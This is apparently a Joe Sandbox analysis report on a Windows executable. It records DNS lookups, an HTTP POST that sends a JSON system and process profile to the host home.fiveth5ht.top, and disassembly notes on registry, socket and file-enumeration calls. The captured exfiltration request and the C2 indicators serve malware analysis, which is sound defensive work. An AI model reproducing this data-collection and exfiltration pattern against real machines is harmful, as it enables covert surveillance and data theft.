                                              Dec 27, 2024 09:02:14.382074118 CET80497375.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:14.382150888 CET80497375.101.3.217192.168.2.10
                                              Dec 27, 2024 09:02:14.382276058 CET4973780192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:14.382749081 CET4973780192.168.2.105.101.3.217
                                              Dec 27, 2024 09:02:14.502171993 CET80497375.101.3.217192.168.2.10
Timestamp                            Source Port  Dest Port  Source IP     Dest IP
Dec 27, 2024 09:01:57.574990034 CET  63866        53         192.168.2.10  1.1.1.1
Dec 27, 2024 09:01:57.575182915 CET  63866        53         192.168.2.10  1.1.1.1
Dec 27, 2024 09:01:57.713411093 CET  53           63866      1.1.1.1       192.168.2.10
Dec 27, 2024 09:01:57.713502884 CET  53           63866      1.1.1.1       192.168.2.10
Dec 27, 2024 09:02:01.949676991 CET  63869        53         192.168.2.10  1.1.1.1
Dec 27, 2024 09:02:01.949784994 CET  63869        53         192.168.2.10  1.1.1.1
Dec 27, 2024 09:02:02.249692917 CET  53           63869      1.1.1.1       192.168.2.10
Dec 27, 2024 09:02:02.251534939 CET  53           63869      1.1.1.1       192.168.2.10
Dec 27, 2024 09:02:12.597645044 CET  62787        53         192.168.2.10  1.1.1.1
Dec 27, 2024 09:02:12.597757101 CET  62787        53         192.168.2.10  1.1.1.1
Dec 27, 2024 09:02:12.737907887 CET  53           62787      1.1.1.1       192.168.2.10
Dec 27, 2024 09:02:12.737946033 CET  53           62787      1.1.1.1       192.168.2.10
Timestamp                            Source IP     Dest IP  Trans ID  OP Code             Name                Type            Class        DNS over HTTPS
Dec 27, 2024 09:01:57.574990034 CET  192.168.2.10  1.1.1.1  0xcee6    Standard query (0)  httpbin.org         A (IP address)  IN (0x0001)  false
Dec 27, 2024 09:01:57.575182915 CET  192.168.2.10  1.1.1.1  0xb7b7    Standard query (0)  httpbin.org         28              IN (0x0001)  false
Dec 27, 2024 09:02:01.949676991 CET  192.168.2.10  1.1.1.1  0x5561    Standard query (0)  home.fiveth5ht.top  A (IP address)  IN (0x0001)  false
Dec 27, 2024 09:02:01.949784994 CET  192.168.2.10  1.1.1.1  0x3196    Standard query (0)  home.fiveth5ht.top  28              IN (0x0001)  false
Dec 27, 2024 09:02:12.597645044 CET  192.168.2.10  1.1.1.1  0xe3a1    Standard query (0)  home.fiveth5ht.top  A (IP address)  IN (0x0001)  false
Dec 27, 2024 09:02:12.597757101 CET  192.168.2.10  1.1.1.1  0xca11    Standard query (0)  home.fiveth5ht.top  28              IN (0x0001)  false
Timestamp                            Source IP  Dest IP       Trans ID  Reply Code    Name                CName  Address         Type            Class        DNS over HTTPS
Dec 27, 2024 09:01:57.713502884 CET  1.1.1.1    192.168.2.10  0xcee6    No error (0)  httpbin.org                3.218.7.103     A (IP address)  IN (0x0001)  false
Dec 27, 2024 09:01:57.713502884 CET  1.1.1.1    192.168.2.10  0xcee6    No error (0)  httpbin.org                34.226.108.155  A (IP address)  IN (0x0001)  false
Dec 27, 2024 09:02:02.249692917 CET  1.1.1.1    192.168.2.10  0x5561    No error (0)  home.fiveth5ht.top         5.101.3.217     A (IP address)  IN (0x0001)  false
Dec 27, 2024 09:02:12.737907887 CET  1.1.1.1    192.168.2.10  0xe3a1    No error (0)  home.fiveth5ht.top         5.101.3.217     A (IP address)  IN (0x0001)  false
• httpbin.org
• home.fiveth5ht.top
Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.10  49710        5.101.3.217     80                8088  C:\Users\user\Desktop\PqHnYMj5eF.exe
Timestamp                            Bytes transferred  Direction  Data
Dec 27, 2024 09:02:02.373819113 CET  12360              OUT        POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                              Host: home.fiveth5ht.top
                                              Accept: */*
                                              Content-Type: application/json
                                              Content-Length: 499951
                                              Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 36 38 37 33 39 31 36 33 36 32 37 30 38 35 35 35 39 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                              Data Ascii: { "ip": "8.46.123.189", "current_time": "8468739163627085559", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 360 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe" [TRUNCATED]
                                              Dec 27, 2024 09:02:11.959888935 CET  309                IN         HTTP/1.1 502 Bad Gateway
                                              Server: nginx/1.22.1
                                              Date: Fri, 27 Dec 2024 08:02:11 GMT
                                              Content-Type: text/html
                                              Content-Length: 157
                                              Connection: close
                                              Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                              Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                              1           192.168.2.10  49737        5.101.3.217     80                8088  C:\Users\user\Desktop\PqHnYMj5eF.exe
                                              Timestamp                            Bytes transferred  Direction  Data
                                              Dec 27, 2024 09:02:12.859179974 CET  350                OUT        POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                              Host: home.fiveth5ht.top
                                              Accept: */*
                                              Content-Type: application/json
                                              Content-Length: 209
                                              Data Ascii: { "id1": "<html>\r\n<head><title>502 Bad Gateway<\/title><\/head>\r\n<body>\r\n<center><h1>502 Bad Gateway<\/h1><\/center>\r\n<hr><center>nginx\/1.22.1<\/center>\r\n<\/body>\r\n<\/html>\r\n", "data": "Done1" }
                                              Dec 27, 2024 09:02:14.382074118 CET  309                IN         HTTP/1.1 502 Bad Gateway
                                              Server: nginx/1.22.1
                                              Date: Fri, 27 Dec 2024 08:02:14 GMT
                                              Content-Type: text/html
                                              Content-Length: 157
                                              Connection: close
                                              Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                              Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                              0           192.168.2.10  49704        3.218.7.103     443               8088  C:\Users\user\Desktop\PqHnYMj5eF.exe
                                              Timestamp                Bytes transferred  Direction  Data
                                              2024-12-27 08:01:59 UTC  52                 OUT        GET /ip HTTP/1.1
                                              Host: httpbin.org
                                              Accept: */*
                                              2024-12-27 08:01:59 UTC  224                IN         HTTP/1.1 200 OK
                                              Date: Fri, 27 Dec 2024 08:01:59 GMT
                                              Content-Type: application/json
                                              Content-Length: 31
                                              Connection: close
                                              Server: gunicorn/19.9.0
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Credentials: true
                                              2024-12-27 08:01:59 UTC  31                 IN         Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                              Data Ascii: { "origin": "8.46.123.189"}



                                              Target ID:0
                                              Start time:03:01:54
                                              Start date:27/12/2024
                                              Path:C:\Users\user\Desktop\PqHnYMj5eF.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\PqHnYMj5eF.exe"
                                              Imagebase:0x3c0000
                                              File size:4'495'872 bytes
                                              MD5 hash:5A249494869B3EF440BD31B438958585
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true


                                                Execution Graph

                                                Execution Coverage:2.1%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:18.5%
                                                Total number of Nodes:270
                                                Total number of Limit Nodes:45
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                                • API String ID: 0-1590685507
                                                • Opcode ID: e06e88ae5fd421d5e9d763ddfa64263602b5e281f81a1b2553fc1228deb0b90a
                                                • Instruction ID: 1b4117995a87f35a404f8a94c1368bd2276a1515d62c2250f5347d1dbe73ce45
                                                • Opcode Fuzzy Hash: e06e88ae5fd421d5e9d763ddfa64263602b5e281f81a1b2553fc1228deb0b90a
                                                • Instruction Fuzzy Hash: 63C28031A043489FD725CF29C484B6AB7E1BF84318F05867DED989B2A2D775ED84CB81

                                                Control-flow Graph

                                                APIs
                                                • GetSystemInfo.KERNELBASE ref: 003C2579
                                                • GlobalMemoryStatusEx.KERNELBASE ref: 003C25CC
                                                • GetDriveTypeA.KERNELBASE ref: 003C2647
                                                • GetDiskFreeSpaceExA.KERNELBASE ref: 003C267E
                                                • KiUserCallbackDispatcher.NTDLL ref: 003C27E2
                                                • FindFirstFileW.KERNELBASE ref: 003C28F8
                                                • FindNextFileW.KERNELBASE ref: 003C291F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                                • String ID: ;%<$@$`
                                                • API String ID: 3271271169-644027288
                                                • Opcode ID: 06dc245ec0dca879a15f207bad81bc84d61fc56ce4e6075bc2a9ed757dbfd958
                                                • Instruction ID: d2ec03369ad526f516364d9270d789e0d267b681d0dff383221dcba8deec99ab
                                                • Opcode Fuzzy Hash: 06dc245ec0dca879a15f207bad81bc84d61fc56ce4e6075bc2a9ed757dbfd958
                                                • Instruction Fuzzy Hash: 23D1A0B49087199FCB50EFA8C58569EBBF0FF48344F018969E898D7311E7749A84CF92

                                                Control-flow Graph (interactive graph not reproduced): function starting at 0x3C29FF. Its basic blocks call FindFirstFileA (0x3C29FF), RegOpenKeyExA (0x3C2A3D), CharUpperA (0x3C2A9F), QueryFullProcessImageNameA and CloseHandle (0x3C2BCC) and CloseHandle again (0x3C2DCF); each API call is preceded by the same pair of internal calls to 0x849C50 and 0x849CE0, and the function also calls 0x748DA0, 0x748E80, 0x748E70, 0x748E68 and 0x748BB0.
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                • String ID: 0
                                                • API String ID: 2406880114-4108050209
                                                • Opcode ID: 4f45222cfff1af0aec7f6737cd0a1f47915e4cd230eee643e4f24290f260fe45
                                                • Instruction ID: d22103d65b1631c24ae3c76e24aa7ca088f9c3382c6e73cc873f399cc8840575
                                                • Opcode Fuzzy Hash: 4f45222cfff1af0aec7f6737cd0a1f47915e4cd230eee643e4f24290f260fe45
                                                • Instruction Fuzzy Hash: B9E1E5B4909319DFCB50EF68D985A9EBBF4EF48344F018869E898D7350EB749984CF42

                                                Control-flow Graph (interactive graph not reproduced): function starting at 0x3D05B0 and ending around 0x3D0AA4. WSAEventSelect is called from the blocks at 0x3D0707 and 0x3D09D0 and WSAEnumNetworkEvents from the block at 0x3D09E8, inside a loop that also calls internal helpers at 0x3D7350, 0x3C70B0, 0x3C70D0, 0x3C70E0, 0x3D03C0, 0x3D7450, 0x3FDEC0, 0x3D7380, 0x3D73B0, 0x3C76A0, 0x3D3000, 0x3D6FA0, 0x3D2F10 and 0x3D6DF0.
                                                APIs
                                                • WSAEventSelect.WS2_32(?,?,?), ref: 003D0711
                                                • WSAEventSelect.WS2_32(?,?,00000000), ref: 003D09DD
                                                • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 003D09FB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: EventSelect$EnumEventsNetwork
                                                • String ID: N=<$multi.c
                                                • API String ID: 2170980988-1445331030
                                                • Opcode ID: d7ea64729ae74ac0c02c0dcc9b76d57715928f06af8af8079201113c8ddd454b
                                                • Instruction ID: ac8969ccb393a20f57a900e7261b84ab9c2d71956c225a9c08df394f5e4a5d1c
                                                • Opcode Fuzzy Hash: d7ea64729ae74ac0c02c0dcc9b76d57715928f06af8af8079201113c8ddd454b
                                                • Instruction Fuzzy Hash: 41D1DF726083019FE716CF20E881B6F77E9FF94B08F05482EF8948A251E774E958DB52

                                                Control-flow Graph (interactive graph not reproduced): function starting at 0x48B180 and ending around 0x48B589. getsockname is called from the block at 0x48B2A9; the function also calls internal helpers at 0x48AF30, 0x48B060, 0x48B020, 0x748B00, 0x48B590, 0x48B660, 0x48B770 (twice) and 0x48B870 (twice).
                                                APIs
                                                • getsockname.WS2_32(-00000020,-00000020,?), ref: 0048B2B7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: getsockname
                                                • String ID: ares__sortaddrinfo.c$cur != NULL
                                                • API String ID: 3358416759-2430778319
                                                • Opcode ID: fc5871a87578e14347d0eec0025631f267a78a5fc7dbb7546ff5a41353fc38e6
                                                • Instruction ID: 7218e5eb916dfabc612c07df9d7b26b0df4301b45008727cd98c1d0c295d54bd
                                                • Opcode Fuzzy Hash: fc5871a87578e14347d0eec0025631f267a78a5fc7dbb7546ff5a41353fc38e6
                                                • Instruction Fuzzy Hash: F2C16C316043059FD718EF24C885A6E77E1EF89318F04896EE8899B3A2D738ED45CBC5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b9972bd78324e8761e382e353888ff52e2990b5baa0f9380c79e69b56cf72228
                                                • Instruction ID: 66af9803ff3ed55fe157029ba32f8f7e7f64b30730ed6155853a4a06eee4afaf
                                                • Opcode Fuzzy Hash: b9972bd78324e8761e382e353888ff52e2990b5baa0f9380c79e69b56cf72228
                                                • Instruction Fuzzy Hash: A991053260D3454BD7378A28E8847BBB2D9EFC4364F168B2EE899432D4F7759D40D681
                                                APIs
                                                • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0047712E,?,?,?,00001001,00000000), ref: 0048A90D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: recvfrom
                                                • String ID:
                                                • API String ID: 846543921-0
                                                • Opcode ID: 02b8fda3d4e9fea08ae8b6f830c628c95bca5ce2a1e129376a79cd1902cd776b
                                                • Instruction ID: 25829fb0812bbf01cbc404084ef3a683f16248663b4acb6dd66be20131ca734d
                                                • Opcode Fuzzy Hash: 02b8fda3d4e9fea08ae8b6f830c628c95bca5ce2a1e129376a79cd1902cd776b
                                                • Instruction Fuzzy Hash: EEF01DB5118348AFE210AE41DC48D6BBBEDEFC9754F05496EF95C133119271AE11CBB2
                                                APIs
                                                • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0047AA19
                                                • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0047AA4C
                                                • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0047AA97
                                                • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0047AAE9
                                                • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0047AB30
                                                • RegCloseKey.KERNELBASE(?), ref: 0047AB6A
                                                • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0047AB82
                                                • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0047AC46
                                                • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0047AD0A
                                                • RegEnumKeyExA.KERNELBASE ref: 0047AD8D
                                                • RegCloseKey.KERNELBASE(?), ref: 0047ADD9
                                                • RegEnumKeyExA.KERNELBASE ref: 0047AE08
                                                • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0047AE2A
                                                • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0047AE54
                                                • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0047AF63
                                                • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0047AFB2
                                                • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0047B072
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: QueryValue$Open$CloseEnum
                                                • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                • API String ID: 4217438148-1047472027
                                                • Opcode ID: 7e8cb7e3fe990a163c08e5676af2359a7924a81030694b2a5a5efadf1f314815
                                                • Instruction ID: 3b2688fd1d2b028a13f7becc1e3040477f32c82496a715a26397e355ea79a9ce
                                                • Opcode Fuzzy Hash: 7e8cb7e3fe990a163c08e5676af2359a7924a81030694b2a5a5efadf1f314815
                                                • Instruction Fuzzy Hash: DD72B1B1608301AFE320DB24CC81B9F77E8EF85744F148829F949972A1E778E955CB97
                                                APIs
                                                • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 003FA832
                                                Strings
                                                • bind failed with errno %d: %s, xrefs: 003FB080
                                                • Bind to local port %d failed, trying next, xrefs: 003FAFE5
                                                • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 003FA6CE
                                                • @, xrefs: 003FA8F4
                                                • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 003FAD0A
                                                • Trying %s:%d..., xrefs: 003FA7C2, 003FA7DE
                                                • Name '%s' family %i resolved to '%s' family %i, xrefs: 003FADAC
                                                • Could not set TCP_NODELAY: %s, xrefs: 003FA871
                                                • @, xrefs: 003FAC42
                                                • Local Interface %s is ip %s using address family %i, xrefs: 003FAE60
                                                • Couldn't bind to '%s' with errno %d: %s, xrefs: 003FAE1F
                                                • cf-socket.c, xrefs: 003FA5CD, 003FA735
                                                • Trying [%s]:%d..., xrefs: 003FA689
                                                • cf_socket_open() -> %d, fd=%d, xrefs: 003FA796
                                                • Local port: %hu, xrefs: 003FAF28
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                 • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1491659045.0000000000D49000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1491659045.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1491659045.0000000000E2D000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1491659045.0000000000E3B000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1492960672.0000000000E3C000.00000080.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1493150751.0000000000FF8000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1493185228.0000000000FFA000.00000080.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3c0000_PqHnYMj5eF.jbxd
                                                Similarity
                                                • API ID: setsockopt
                                                • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                • API String ID: 3981526788-2373386790
                                                • Opcode ID: 4cb2aab865a51aa71afa127a35c871797e45222cb840556ce623ae1f99adebff
                                                • Instruction ID: 387afc3a33229b9009a505e00ce4140aac85a9b3300e6951e5edb1c7e19efb68
                                                • Opcode Fuzzy Hash: 4cb2aab865a51aa71afa127a35c871797e45222cb840556ce623ae1f99adebff
                                                • Instruction Fuzzy Hash: 2562F5B1504745ABE722CF14C846FBBB7E4AF90304F054929FA8C9B292E771A845CB93

                                                 Control-flow Graph
                                                 • Graph image (legend: Executed / Not Executed): basic blocks 00489740-0048A070; API nodes RegOpenKeyExA, RegQueryValueExA, RegCloseKey
                                                APIs
                                                • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00489946
                                                • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00489974
                                                • RegCloseKey.KERNELBASE(?), ref: 0048998B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1490873560.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                 • Associated: 00000000.00000002.1490840236.00000000003C0000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1490873560.0000000000931000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1490873560.0000000000A97000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1490873560.0000000000A99000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1491641301.0000000000A9C000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1491659045.0000000000A9E000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1491659045.0000000000C28000.00000040.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1491659045.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
